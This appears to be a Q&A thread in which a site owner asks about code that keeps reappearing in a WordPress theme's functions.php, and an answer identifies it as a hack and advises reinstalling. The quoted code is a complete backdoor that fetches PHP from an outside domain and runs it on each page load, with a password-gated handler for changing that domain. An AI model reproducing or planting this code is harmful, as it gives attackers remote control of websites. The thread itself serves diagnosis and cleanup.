This code appears in my theme’s functions.php
, also in child theme’s. I’ve deleted it for two times but it comes back. What is it?
if ( isset( $_REQUEST['action'] ) && isset( $_REQUEST['password'] ) && ( $_REQUEST['password'] == '227972a1a62825660efb0f32126db07f' ) ) {
$div_code_name = "wp_vcd";
switch ( $_REQUEST['action'] ) {
case 'change_domain';
if ( isset( $_REQUEST['newdomain'] ) ) {
if ( ! empty( $_REQUEST['newdomain'] ) ) {
if ( $file = @file_get_contents( __FILE__ ) ) {
if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain ) ) {
$file = preg_replace( "https://wordpress.stackexchange.com/" . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file );
@file_put_contents( __FILE__, $file );
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die( "" );
}
if ( ! function_exists( 'theme_temp_setup' ) ) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[ REQUEST_URI ];
if ( stripos( $_SERVER['REQUEST_URI'], 'wp-cron.php' ) == false && stripos( $_SERVER['REQUEST_URI'], 'xmlrpc.php' ) == false ) {
if ( $tmpcontent = @file_get_contents( "http://www.dolsh.cc/code4.php?i=" . $path ) ) {
function theme_temp_setup( $phpCode ) {
$tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
$handle = fopen( $tmpfname, "w+" );
fwrite( $handle, "<?php\n" . $phpCode );
fclose( $handle );
include $tmpfname;
unlink( $tmpfname );
return get_defined_vars();
}
extract( theme_temp_setup( $tmpcontent ) );
}
}
}
4 s
Your website has been hacked. This is malicious code that gets triggered from the outside, loading more malicious content from ‘www.dolsh.cc’ domain.
If the content comes back after you remove it, then you have hacked files somewhere else that will automatically rewrite functions.php any time page is loaded. You need to find and clean up all infected files, and it is impossible to tell which files are infected without detailed review of the website. Most infections like this spread into various areas to make sure they are hard to remove.
You should backup database, and then reinstall WordPress from scratch, all plugins you have and them that is not infected. It is possible that some plugin is the source of the infection, or the theme itself. If you have download plugins or themes from some illegal website (offering premium plugins for free), that is the most likely source of the infection.